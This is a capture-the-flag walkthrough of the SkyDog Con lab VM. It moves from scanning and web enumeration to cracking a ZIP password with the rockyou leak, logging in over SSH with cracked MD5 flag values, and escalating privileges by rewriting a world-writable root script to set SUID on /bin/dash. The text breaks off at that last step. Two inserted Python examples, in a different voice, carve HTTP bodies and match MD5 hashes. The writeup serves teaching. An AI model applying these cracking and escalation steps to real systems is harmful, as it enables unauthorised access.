SkyDog Con CTF Writeup
- Service Discovery
- Port 80
- Landing Page
- robots.txt
- /Setec/
- /Setec/Astronomy/
- OSINT
- Company Traffic
- OSINT
- Little Black Box
- Another route
- Conclusion
After noticing a Tweet stating that the SkyDog Con CTF was now available for download, I decided to take a look.
This CTF apparently has six flags to find.
Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box
Let's get started!
Service Discovery
nmap -sT -T4 -A -v 192.168.57.101
Starting Nmap 6.49SVN ( https://nmap.org ) at 2015-11-03 08:22 GMT
NSE: Loaded 127 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Initiating ARP Ping Scan at 08:22
Scanning 192.168.57.101 [1 port]
Completed ARP Ping Scan at 08:22, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:22
Completed Parallel DNS resolution of 1 host. at 08:22, 0.01s elapsed
Initiating Connect Scan at 08:22
Scanning 192.168.57.101 [1000 ports]
Discovered open port 80/tcp on 192.168.57.101
Discovered open port 22/tcp on 192.168.57.101
Completed Connect Scan at 08:22, 2.46s elapsed (1000 total ports)
Initiating Service scan at 08:22
Scanning 2 services on 192.168.57.101
Completed Service scan at 08:22, 6.01s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.57.101
adjust_timeouts2: packet supposedly had rtt of -152001 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -152001 microseconds. Ignoring time.
NSE: Script scanning 192.168.57.101.
Initiating NSE at 08:22
Completed NSE at 08:22, 0.38s elapsed
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Nmap scan report for 192.168.57.101
Host is up (0.0082s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
| 2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
|_ 256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl
|_/addurl/image? /mail/ /pagead/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:EF:0B:15 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 198.839 days (since Sat Apr 18 13:14:16 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 8.22 ms 192.168.57.101
NSE: Script Post-scanning.
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds
Raw packets sent: 33 (2.406KB) | Rcvd: 24 (1.638KB)
So, we've got an SSH server on port 22 and a web server on port 80.
I briefly check SSH, but there is nothing of interest at the moment (no banner).
Let's move on.
Port 80
Thanks to nmap's scripts, we can already see that there is a 'robots.txt' file.
/search
/sdch
/groups
/catalogs
/catalogues
/news
/nwshp
/setnewsprefs?
/index.html?
/?
/?hl=*&
/?hl=*&*&gws_rd=ssl
/addurl/image?
/mail/
/pagead/
Landing Page
All that's output on the page is a JPG.
I use exiftool to check for any interesting information.
exiftool SkyDogCon_CTF.jpg
ExifTool Version Number : 9.74
File Name : SkyDogCon_CTF.jpg
Directory : .
File Size : 83 kB
File Modification Date/Time : 2015:09:18 12:35:25+01:00
File Access Date/Time : 2015:11:03 08:34:12+00:00
File Inode Change Date/Time : 2015:11:03 08:34:12+00:00
File Permissions : rw-rw-r--
File Type : JPEG
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Exif Byte Order : Big-endian (Motorola, MM)
Software : Adobe ImageReady
XP Comment : flag{abc40a2d4e023b42bd1ff04891549ae2}
Padding : (Binary data 2060 bytes, use -b option to extract)
Image Width : 900
Image Height : 525
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 900x525
In the XP Comment field, we get our first flag. I'll try and match up the flags I find with the statements in the intro text.
Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
flag{abc40a2d4e023b42bd1ff04891549ae2}
Next, I start to check out the directories listed in the 'robots.txt' file.
robots.txt
For completeness, I manually fetch the 'robots.txt' file.
# Congrats Mr. Bishop, your getting good - flag{cd4f10fcba234f0e8b2f60a490c306e6}
#
User-agent:*
Disallow: /search
Allow: /search/about
Disallow: /sdch
Disallow: /groups
Disallow: /catalogs
Allow: /catalogs/about
Allow: /catalogs/p?
Disallow: /catalogues
Allow: /newsalerts
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow: /index.html?
Disallow: /?
Allow: /?hl=
Disallow: /?hl=*&
Allow: /?hl=*&gws_rd=ssl$
Disallow: /?hl=*&*&gws_rd=ssl
Allow: /?gws_rd=ssl$
Allow: /?pt1=true$
Disallow: /addurl/image?
Allow: /mail/help/
Disallow: /mail/
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /imgres
Disallow: /imglanding
Disallow: /sbd
Disallow: /keyword/
Disallow: /u/
Disallow: /univ/
Disallow: /cobrand
Disallow: /custom
Disallow: /advanced_group_search
Disallow: /googlesite
Disallow: /preferences
Disallow: /setprefs
Disallow: /swr
Disallow: /url
Disallow: /default
Disallow: /m?
Disallow: /m/
Allow: /m/finance
Disallow: /wml?
Disallow: /wml/?
Disallow: /wml/search?
Disallow: /xhtml?
Disallow: /xhtml/?
Disallow: /xhtml/search?
Disallow: /xml?
Disallow: /imode?
Disallow: /imode/?
Disallow: /imode/search?
Disallow: /jsky?
Disallow: /jsky/?
Disallow: /jsky/search?
Disallow: /pda?
Disallow: /pda/?
Disallow: /pda/search?
Disallow: /sprint_xhtml
Disallow: /sprint_wml
Disallow: /pqa
Disallow: /palm
Disallow: /gwt/
Disallow: /purchases
Disallow: /bsd?
Disallow: /linux?
Disallow: /mac?
Disallow: /microsoft?
Disallow: /unclesam?
Disallow: /answers/search?q=
Disallow: /local?
Disallow: /local_url
Disallow: /shihui?
Disallow: /shihui/
Disallow: /froogle?
Disallow: /products?
Disallow: /froogle_
Disallow: /product_
Disallow: /products_
Disallow: /products;
Disallow: /print
Disallow: /books/
Disallow: /bkshp?*q=*
Disallow: /books?*q=*
Disallow: /books?*output=*
Disallow: /books?*pg=*
Disallow: /books?*jtp=*
Disallow: /books?*jscmd=*
Disallow: /books?*buy=*
Disallow: /books?*zoom=*
Allow: /books?*q=related:*
Allow: /books?*q=editions:*
Allow: /books?*q=subject:*
Allow: /books/about
Allow: /booksrightsholders
Allow: /books?*zoom=1*
Allow: /books?*zoom=5*
Disallow: /ebooks/
Disallow: /ebooks?*q=*
Disallow: /ebooks?*output=*
Disallow: /ebooks?*pg=*
Disallow: /ebooks?*jscmd=*
Disallow: /ebooks?*buy=*
Disallow: /ebooks?*zoom=*
Allow: /ebooks?*q=related:*
Allow: /ebooks?*q=editions:*
Allow: /ebooks?*q=subject:*
Allow: /ebooks?*zoom=1*
Allow: /ebooks?*zoom=5*
Disallow: /patents?
Disallow: /patents/download/
Disallow: /patents/pdf/
Disallow: /patents/related/
Disallow: /scholar
Disallow: /citations?
Allow: /citations?user=
Disallow: /citations?*cstart=
Allow: /citations?view_op=new_profile
Allow: /citations?view_op=top_venues
Disallow: /complete
Disallow: /s?
Disallow: /sponsoredlinks
Disallow: /videosearch?
Disallow: /videopreview?
Disallow: /videoprograminfo?
Allow: /maps?*output=classic*
Allow: /maps/api/js?
Allow: /maps/d/
Disallow: /maps?
Disallow: /mapstt?
Disallow: /mapslt?
Disallow: /maps/stk/
Disallow: /maps/br?
Disallow: /mapabcpoi?
Disallow: /maphp?
Disallow: /mapprint?
Disallow: /maps/api/js/
Disallow: /maps/api/staticmap?
Disallow: /mld?
Disallow: /staticmap?
Disallow: /places/
Allow: /places/$
Allow: /Setec/
Disallow: /maps/preview
Disallow: /maps/place
Disallow: /help/maps/streetview/partners/welcome/
Disallow: /help/maps/indoormaps/partners/
Disallow: /lochp?
Disallow: /center
Disallow: /ie?
Disallow: /sms/demo?
Disallow: /katrina?
Disallow: /blogsearch?
Disallow: /blogsearch/
Disallow: /blogsearch_feeds
Disallow: /advanced_blog_search
Disallow: /uds/
Disallow: /chart?
Disallow: /transit?
Disallow: /mbd?
Disallow: /extern_js/
Disallow: /xjs/
Disallow: /calendar/feeds/
Disallow: /calendar/ical/
Disallow: /cl2/feeds/
Disallow: /cl2/ical/
Disallow: /coop/directory
Disallow: /coop/manage
Disallow: /trends?
Disallow: /trends/music?
Disallow: /trends/hottrends?
Disallow: /trends/viz?
Disallow: /trends/embed.js?
Disallow: /trends/fetchComponent?
Disallow: /notebook/search?
Disallow: /musica
Disallow: /musicad
Disallow: /musicas
Disallow: /musicl
Disallow: /musics
Disallow: /musicsearch
Disallow: /musicsp
Disallow: /musiclp
Disallow: /browsersync
Disallow: /call
Disallow: /archivesearch?
Disallow: /archivesearch/url
Disallow: /archivesearch/advanced_search
Disallow: /base/reportbadoffer
Disallow: /urchin_test/
Disallow: /movies?
Disallow: /codesearch?
Disallow: /codesearch/feeds/search?
Disallow: /wapsearch?
Disallow: /reviews/search?
Disallow: /orkut/albums
Allow: /jsapi
Disallow: /views?
Disallow: /c/
Disallow: /cbk
Allow: /cbk?output=tile&cb_client=maps_sv
Disallow: /recharge/dashboard/car
Disallow: /recharge/dashboard/static/
Disallow: /translate_a/
Disallow: /translate_c
Disallow: /translate_f
Disallow: /translate_static/
Disallow: /translate_suggestion
Disallow: /profiles/me
Allow: /profiles
Disallow: /s2/profiles/me
Allow: /s2/profiles
Allow: /s2/oz
Allow: /s2/photos
Allow: /s2/search/social
Allow: /s2/static
Disallow: /s2
Disallow: /transconsole/portal/
Disallow: /gcc/
Disallow: /aclk
Disallow: /cse?
Disallow: /cse/home
Disallow: /cse/panel
Disallow: /cse/manage
Disallow: /tbproxy/
Disallow: /imesync/
Disallow: /shenghuo/search?
Disallow: /support/forum/search?
Disallow: /reviews/polls/
Disallow: /hosted/images/
Disallow: /ppob/?
Disallow: /ppob?
Disallow: /adwordsresellers
Disallow: /accounts/ClientLogin
Disallow: /accounts/ClientAuth
Disallow: /accounts/o8
Allow: /accounts/o8/id
Disallow: /topicsearch?q=
Disallow: /xfx7/
Disallow: /squared/api
Disallow: /squared/search
Disallow: /squared/table
Disallow: /toolkit/
Allow: /toolkit/*.html
Disallow: /globalmarketfinder/
Allow: /globalmarketfinder/*.html
Disallow: /qnasearch?
Disallow: /app/updates
Disallow: /sidewiki/entry/
Disallow: /quality_form?
Disallow: /labs/popgadget/search
Disallow: /buzz/post
Disallow: /compressiontest/
Disallow: /analytics/reporting/
Disallow: /analytics/admin/
Disallow: /analytics/web/
Disallow: /analytics/feeds/
Disallow: /analytics/settings/
Allow: /alerts/manage
Allow: /alerts/remove
Disallow: /alerts/
Allow: /alerts/$
Disallow: /ads/search?
Disallow: /ads/plan/action_plan?
Disallow: /ads/plan/api/
Disallow: /ads/hotels/partners
Disallow: /phone/compare/?
Disallow: /travel/clk
Disallow: /hotelfinder/rpc
Disallow: /hotels/rpc
Disallow: /flights/rpc
Disallow: /commercesearch/services/
Disallow: /evaluation/
Disallow: /chrome/browser/mobile/tour
Disallow: /compare/*/apply*
Disallow: /forms/perks/
Disallow: /baraza/*/search
Disallow: /baraza/*/report
Disallow: /shopping/suppliers/search
Disallow: /ct/
Disallow: /edu/cs4hs/
Disallow: /trustedstores/s/
Disallow: /trustedstores/tm2
Disallow: /trustedstores/verify
Disallow: /adwords/proposal
Disallow: /shopping/product/
Disallow: /shopping/seller
Disallow: /shopping/reviewer
Disallow: /about/careers/apply/
Disallow: /about/careers/applications/
Disallow: /landing/signout.html
Disallow: /webmasters/sitemaps/ping?
Disallow: /ping?
Allow: /gb/images
Allow: /gb/js
Disallow: /gallery/
Looks like we've actually got a great many more entries in 'robots.txt' than nmap initially reported, and we've got our second flag!
Flag #2 When do Androids Learn to Walk?
flag{cd4f10fcba234f0e8b2f60a490c306e6}
The content of the 'robots.txt' file looks like at least a partial copy of Google's. This should be fun.
I write a quick Python script to parse the 'robots.txt' file, and test each URL defined therein.
import requests

# Read robots.txt and request every Allow/Disallow path on the target;
# anything that does not come back 404 is worth a closer look.
with open('robots.txt', 'r') as f:
    lines = f.readlines()

for line in lines:
    line = line.strip()
    if line and line[0] != '#':
        lineSplit = line.split(': ')
        if lineSplit[0].lower() in ('allow', 'disallow'):
            targetUrl = 'http://192.168.57.101%s' % lineSplit[1].strip()
            r = requests.get(targetUrl)
            if r.status_code != 404:
                print(targetUrl)
And here's the output.
python extract-robots.py
http://192.168.57.101/index.html?
http://192.168.57.101/?
http://192.168.57.101/?hl=
http://192.168.57.101/?hl=*&
http://192.168.57.101/?hl=*&gws_rd=ssl$
http://192.168.57.101/?hl=*&*&gws_rd=ssl
http://192.168.57.101/?gws_rd=ssl$
http://192.168.57.101/?pt1=true$
http://192.168.57.101/Setec/
So, we've got a single real URL to check from 'robots.txt': '/Setec/'.
/Setec/
Before opening the URL in the browser, I check out the source behind it with curl.
<html>
<img src="./Astronomy/Setec_Astronomy.jpg" width="1024" height="768" alt="" />
<!--
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker_Approved("NSA-Agent-Abbott"; AKA Darth Vader);
pageTracker._trackPageview();
} catch(err) {}</script>
-->
</html>
So we've got a JPG, and by the looks of it there is a hint in the commented out page tracker ("NSA-Agent-Abbott"; AKA Darth Vader).
I couldn't find anything of interest in the image.
/Setec/Astronomy/
I request the Astronomy directory, and am presented with a directory listing.
Index of /Setec/Astronomy
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[IMG] Setec_Astronomy.jpg 2015-09-18 16:34 167K
[ ] Whistler.zip 2015-09-18 16:59 488
Cool - let's download the ZIP and take a look.
test@test-VirtualBox:~/skydog$ unzip -l Whistler.zip
Archive: Whistler.zip
Length Date Time Name
--------- ---------- ----- ----
38 2015-09-18 21:58 flag.txt
61 2015-09-18 21:29 QuesttoFindCosmo.txt
--------- -------
99 2 files
test@test-VirtualBox:~/skydog$ unzip Whistler.zip
Archive: Whistler.zip
[Whistler.zip] flag.txt password:
Damn - the ZIP file is encrypted.
Using 'fcrackzip', I test the ZIP against passwords from the 'rockyou' dump.
fcrackzip -D -v -u -p /opt/leaked_db-rockyou.txt Whistler.zip
found file 'flag.txt', (size cp/uc 50/ 38, flags 9, chk 874a)
found file 'QuesttoFindCosmo.txt', (size cp/uc 72/ 61, flags 9, chk 83b5)
PASSWORD FOUND!!!!: pw == yourmother
Awesome - I unzip the archive, and cat out the contents of the two files.
test@test-VirtualBox:~/skydog$ unzip Whistler.zip
Archive: Whistler.zip
[Whistler.zip] flag.txt password:
extracting: flag.txt
inflating: QuesttoFindCosmo.txt
test@test-VirtualBox:~/skydog$ echo $(cat flag.txt)
flag{1871a3c1da602bf471d3d76cc60cdb9b}
test@test-VirtualBox:~/skydog$ echo $(cat QuesttoFindCosmo.txt)
Time to break out those binoculars and start doing some OSINT
So, we've got another flag.
Flag #3 Who Can You Trust?
flag{1871a3c1da602bf471d3d76cc60cdb9b}
OSINT
Next, we're told that we need to perform some OSINT. The only name I've got to go on so far is 'NSA Agent Abbott', from the source of the page '/Setec/'.
After a quick Google, we find a mention of an Agent Abbott on an IMDB listing for a film named 'Sneakers'.
Funnily enough, under the quotes for this character, there's a reference to another character named 'Whistler'.
Under the Wikipedia article for the film, there is also mention of a character named 'Cosmo'.
Another reference is from the source of the page '/Setec/'. The text states '"NSA-Agent-Abbott"; AKA Darth Vader'. This appears to be a reference to the actor James Earl Jones, who both voiced Darth Vader in the Star Wars franchise, and played the part of NSA Agent Bernard Abbott in Sneakers.
One last reference - which I didn't spot before - is in the image on the page '/Setec/'. The image has text that reads 'too many secrets'. This is an anagram for 'Setec Astronomy', as used in the film - you guessed it - Sneakers.
These are enough coincidences to convince me there is something we need to retrieve from the film script, related media, or more particularly the actor - James Earl Jones.
After digging, all I came up with was scripts and trivia. As the previous URL we had - '/Setec/' - was named from a term in the film, I dug through trivia and built up a word list, to run through dirbuster.
First of all, I copied all of the text from the IMDB Trivia article for the film into a file. I then ran a command to extract all the unique words from the file, and used this list as a wordlist for dirbuster. This was my resulting word list.
A minute or so later, dirbuster threw up a few matches - awesome!
Directories found during testing:
Dirs found with a 200 response:
/
/PlayTronics/
Dirs found with a 403 response:
/icons/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/PlayTronics/flag.txt
/PlayTronics/companytraffic.pcap
Opening up '/PlayTronics/flag.txt', we are rewarded with our fourth flag. Not entirely sure on this reference.
Flag #4 Who Doesn’t Love a Good Cocktail Party?
flag{c07908a705c22922e6d416e0e1107d99}
Also in the directory, we have a pcap file.
Company Traffic
At first glance, the pcap file appears to contain a great deal of HTTPS traffic to SoundCloud, along with DNS lookups for domains hosting associated assets. There are also the occasional STP (Spanning Tree Protocol) frames.
Towards the end of the pcap is an HTTP request to download an MP3 file.
GET /8Q3zbtBpxOHb.128.mp3?Policy=eyJTdGF0ZW1lbnQiOlt7IlJlc291cmNlIjoiKjovL2NmLW1lZGlhLnNuZGNkbi5jb20vOFEzemJ0QnB4T0hiLjEyOC5tcDMiLCJDb25kaXRpb24iOnsiRGF0ZUxlc3NUaGFuIjp7IkFXUzpFcG9jaFRpbWUiOjE0NDI1OTUwMDl9fX1dfQ__&Signature=YcIjOhLpPVrZXLO-WBktwm2ooBU4V1gQx8fazVm-cbyN8Y-NtqqOTeF9ENniPe5YOHqVMn8gWmGz~LeiAu1X4hvZkjiVZBCtSMPg6P9K54iZY2xQXwkmLM8BkgYaVkVB56Dt4F2UWbBNtZmXO5wM9qIp8Aazdbq0oIUWzGZ4GA37Rcb7ib0dIL-zXoDc~Qz2L9k4Mq-mixGesFRCbhEkW-JVkXnLxO-u3bIXVzHT7U9yprPQEGfykvzEXiXcU83u7fTo-jQOJeecfGfgdCJC3sCzExuZ8Lexz0nGvnl2-MlqWacDmad6e46g0tlEiu-l2JVnWKNd853mRFxON0Kgng__&Key-Pair-Id=APKAJAGZ7VMH2PFPW6UQ HTTP/1.1
Host: cf-media.sndcdn.com
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
This was sent to the IP 54.239.172.25, from the IP 192.168.2.223.
I follow the TCP stream and save the response contents to a file. I then open it in the 'bless' hex editor and strip the response headers, which leaves the complete MP3 file.
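Stripping the headers by hand in a hex editor works, but it is easy to leave a stray byte behind. As an added example, not part of the original writeup, here is a small Python carver that does the same job on a saved TCP stream: it splits at the end-of-headers marker, uses Content-Length to cut off anything that is not the file, and sanity-checks that what is left starts like an MP3. The sample response bytes are constructed for illustration and are not the real file from companytraffic.pcap.

```python
import re

# Constructed sample of what "Follow TCP Stream" -> "Save As" produces for the
# server side of the conversation: HTTP response headers followed by the raw
# body. The body is a 10-byte stand-in for the MP3, not the real file.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: audio/mpeg\r\n"
    b"Content-Length: 10\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"ID3\x03\x00\x00\x00\x00\x00\x00"
)

HEADER_END = b"\r\n\r\n"


def carve_http_body(raw):
    """Strip the HTTP response headers from a saved TCP stream.

    Returns (status_code, headers_dict, body). Raises ValueError when the
    data does not look like a complete HTTP response, so a truncated capture
    is reported instead of silently producing a corrupt file. Chunked
    transfer encoding is not handled here.
    """
    idx = raw.find(HEADER_END)
    if idx == -1:
        raise ValueError("no end-of-headers marker found; stream is truncated")
    head = raw[:idx].decode("iso-8859-1")
    body = raw[idx + len(HEADER_END):]

    lines = head.split("\r\n")
    m = re.match(r"HTTP/\d\.\d (\d{3})", lines[0])
    if not m:
        raise ValueError("missing HTTP status line: %r" % lines[0])
    status = int(m.group(1))

    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    # Honour Content-Length when present: bytes beyond it (e.g. a second
    # keep-alive response on the same connection) are not part of the file.
    if "content-length" in headers:
        length = int(headers["content-length"])
        if len(body) < length:
            raise ValueError("body truncated: %d of %d bytes" % (len(body), length))
        body = body[:length]
    return status, headers, body


def looks_like_mp3(body):
    """Cheap sanity check: an ID3v2 tag or an MPEG audio frame sync at offset 0."""
    if body.startswith(b"ID3"):
        return True
    return len(body) >= 2 and body[0] == 0xFF and (body[1] & 0xE0) == 0xE0


def carve_sample():
    """Run the carver over the constructed sample and summarise the result."""
    status, headers, body = carve_http_body(SAMPLE_RESPONSE)
    return status, headers.get("content-type"), body, looks_like_mp3(body)


if __name__ == "__main__":
    status, ctype, body, is_mp3 = carve_sample()
    print(status, ctype, len(body), "bytes,", "mp3" if is_mp3 else "not mp3")
```

On the real capture, read the saved stream with open(path, "rb"), pass it to carve_http_body and write the returned body out as the .mp3.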
After listening to the MP3 numerous times, I can make out the words 'my name is', 'passport' and 'verify', but I can't make out the name. After a little Googling, another Sneakers reference came up, and I managed to link it to a YouTube video. The full text for the snippet is as follows.
Hi. My Name Is Werner Brandes. My Voice Is My Passport. Verify Me.
Great, so that's where the sound bite came from, and that's the full content - what use is it to me?
I've tried logging in to SSH with variations of the name 'Werner Brandes', with word lists generated from my previous findings, but so far have come up blank.
OSINT
I'm going to admit - I got stuck here. I was pretty sure I had to login to SSH using some variation of the name 'Werner Brandes', but the password evaded me. After speaking to the author, a bomb was dropped that there was a reason MD5 hashes were used instead of SHA1.
Immediately, I entered my gathered flag hashes into Crackstation.
abc40a2d4e023b42bd1ff04891549ae2
Welcome Home
cd4f10fcba234f0e8b2f60a490c306e6
Bots
1871a3c1da602bf471d3d76cc60cdb9b
yourmother
c07908a705c22922e6d416e0e1107d99
leroybrown
Leroy Brown? Where did he come from?
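As an added example (my code, not from the original writeup), this is what Crackstation is doing for us, done offline: MD5 each word in a short candidate list and compare against the 32-hex values inside the flags. It also tries obvious spelling variants, since the recovered words mix 'Welcome Home' and 'leroybrown'. The candidate words are the ones the writeup recovered; the lookup logic is mine.

```python
import hashlib
import re

FLAG_RE = re.compile(r"flag\{([0-9a-f]{32})\}")

# The four flags recovered so far in the writeup.
FLAGS = [
    "flag{abc40a2d4e023b42bd1ff04891549ae2}",
    "flag{cd4f10fcba234f0e8b2f60a490c306e6}",
    "flag{1871a3c1da602bf471d3d76cc60cdb9b}",
    "flag{c07908a705c22922e6d416e0e1107d99}",
]

# Words the writeup got back from Crackstation for those hashes.
RECOVERED_WORDS = ["Welcome Home", "Bots", "yourmother", "leroybrown"]


def variants(word):
    """Spellings worth trying for each candidate: as given, lower, UPPER,
    Title Case, and each of those with spaces removed."""
    forms = {word, word.lower(), word.upper(), word.title()}
    squashed = {w.replace(" ", "") for w in forms}
    return forms | squashed


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def crack_flags(flags, candidates):
    """Map each flag's hex value to the candidate variant whose MD5 matches,
    or None. The candidate table is built once, so the cost is linear in
    candidates plus flags rather than their product."""
    table = {}
    for cand in candidates:
        for form in variants(cand):
            table.setdefault(md5_hex(form), form)
    result = {}
    for flag in flags:
        m = FLAG_RE.fullmatch(flag.strip())
        if not m:
            raise ValueError("not a flag{md5} value: %r" % flag)
        result[m.group(1)] = table.get(m.group(1))
    return result


if __name__ == "__main__":
    for digest, word in crack_flags(FLAGS, RECOVERED_WORDS).items():
        print(digest, "->", word)
```

The point for a defender is the same one the CTF makes: an unsalted MD5 of a short word is a lookup, not a secret.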
After some experimentation, I hit upon pay dirt - username: wernerbrandes, password: leroybrown.
ssh wernerbrandes@192.168.57.101
wernerbrandes@192.168.57.101's password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)
* Documentation: https://help.ubuntu.com/
System information as of Tue Nov 3 10:23:30 EST 2015
System load: 0.0 Memory usage: 2% Processes: 79
Usage of /: 10.5% of 17.34GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
https://landscape.canonical.com/
30 packages can be updated.
21 updates are security updates.
Last login: Fri Oct 30 19:08:28 2015 from 10.0.2.5
wernerbrandes@skydogctf:~$ ls -alh
total 32K
drwxr-xr-x 3 wernerbrandes wernerbrandes 4.0K Oct 30 19:09 .
drwxr-xr-x 4 root root 4.0K Sep 18 15:58 ..
-rw------- 1 wernerbrandes wernerbrandes 0 Oct 30 19:09 .bash_history
-rw-r--r-- 1 wernerbrandes wernerbrandes 220 Sep 18 15:58 .bash_logout
-rw-r--r-- 1 wernerbrandes wernerbrandes 3.6K Sep 18 15:58 .bashrc
drwx------ 2 wernerbrandes wernerbrandes 4.0K Sep 18 16:13 .cache
-rw-r--r-- 1 nemo nemo 38 Sep 18 17:39 flag.txt
-rw-r--r-- 1 wernerbrandes wernerbrandes 675 Sep 18 15:58 .profile
-rw-rw-r-- 1 wernerbrandes wernerbrandes 66 Oct 25 11:17 .selected_editor
wernerbrandes@skydogctf:~$ echo $(cat flag.txt)
flag{82ce8d8f5745ff6849fa7af1473c9b35}
There's our fifth flag!
Flag #5 Another Day at the Office
flag{82ce8d8f5745ff6849fa7af1473c9b35}
Funnily enough, this MD5 hash is not found on Crackstation. We've got one more flag to get.
Little Black Box
Another reference to Sneakers.
Let's have a sniff around the file system.
wernerbrandes@skydogctf:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
nemo:x:1000:1000:nemo,,,:/home/nemo:/bin/bash
wernerbrandes:x:1001:1001:Werner Brandes,,,:/home/wernerbrandes:/bin/bash
There's only one other non-system user available to us - nemo.
wernerbrandes@skydogctf:~$ groups nemo
nemo : nemo adm cdrom sudo dip plugdev lpadmin sambashare
The 'nemo' user is part of the sudo group.
After a while spent attempting to access the nemo user, using passwords previously seen in this challenge, lists of common passwords and various other word lists, I come up empty.
Another route
In desperation, I decide to search for world writable files.
wernerbrandes@skydogctf:~$ find / -perm -0002 -type f 2>/dev/null | grep -v "/proc/"
/lib/log/sanitizer.py
/sys/kernel/security/apparmor/.access
wernerbrandes@skydogctf:~$ ls -alh /lib/log/sanitizer.py
-rwxrwxrwx 1 root root 127 Nov 3 14:06 /lib/log/sanitizer.py
Interesting - this doesn't look like a script that exists in any Ubuntu distribution I've worked with. Let's see what it does.
wernerbrandes@skydogctf:~$ cat /lib/log/sanitizer.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
OK, so it looks like it's clearing out the '/tmp/' directory. I'm guessing this is run at a specific interval, to ensure '/tmp/' does not fill up with junk.
It's owned by 'root', so I hope that it gets run by root.
I update the script to set the SUID bit on the '/bin/dash' binary, and wait for a while.
#!/usr/bin/env python
import os
import sys
try:
